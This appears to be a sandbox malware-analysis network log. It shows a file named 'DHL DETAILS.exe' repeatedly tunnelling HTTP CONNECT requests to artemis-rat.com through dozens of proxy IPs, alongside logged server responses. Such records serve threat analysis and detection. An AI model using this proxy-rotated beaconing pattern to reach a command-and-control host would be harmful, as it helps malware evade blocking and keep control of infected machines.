                                                                                    Mar 9, 2024 13:14:15.838649035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.999521017 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    905192.168.2.552887188.166.17.1888816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.841567039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    906192.168.2.55186647.243.114.19281806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.841799974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    907192.168.2.55289818.135.211.18231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.842128038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.137001038 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    908192.168.2.553016104.16.109.143806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.843235970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.997459888 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    909192.168.2.55197551.75.126.150118026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.844001055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    910192.168.2.552867185.220.226.2358086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.853046894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    911192.168.2.552721110.93.227.2831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.853221893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.615243912 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    912192.168.2.55020491.134.140.160564956352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.853600979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.380209923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    913192.168.2.552910146.56.146.5483846352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.860914946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.536403894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    914192.168.2.553012159.65.77.16885856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.861026049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    915192.168.2.551776187.40.1.1231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.861329079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036209106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.386306047 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    916192.168.2.55024891.134.140.160398036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.864203930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.536247015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.224265099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.536668062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.037000895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    917192.168.2.55290143.133.70.57156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.870383024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    918192.168.2.550407162.241.79.22520486352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.878536940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036418915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    919192.168.2.552993129.213.150.20580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.885886908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    920192.168.2.55289951.161.131.84492026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.910062075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.723855019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.833388090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.038846016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    921192.168.2.552948130.162.213.17531296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.912744045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    922192.168.2.55200192.204.135.37634626352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.937289953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.973859072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    923192.168.2.552978221.153.92.39806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.959683895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    924192.168.2.552943185.49.30.580816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.962574005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    925192.168.2.552942194.182.178.9031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.964212894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.292920113 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    926192.168.2.55299772.210.221.19741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.964234114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    927192.168.2.553000170.245.57.22880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.965531111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    928192.168.2.55296443.131.246.77156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.968780041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    929192.168.2.552984119.28.4.11299996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.972038984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    930192.168.2.550491162.214.170.144253476352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.988492966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036396027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.036969900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.051846981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    931192.168.2.552949115.239.234.4373026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.990304947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.320828915 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    932192.168.2.553022129.213.150.205806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.991645098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    933192.168.2.55296794.177.106.17823246352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.991664886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    934192.168.2.551690117.160.250.13888996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.993098974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.615556955 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    935192.168.2.552937202.139.198.1530306352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.995115042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    936192.168.2.552048186.96.50.209996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.995356083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.547626972 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    937192.168.2.55049851.222.241.157225386352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.000936985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036441088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


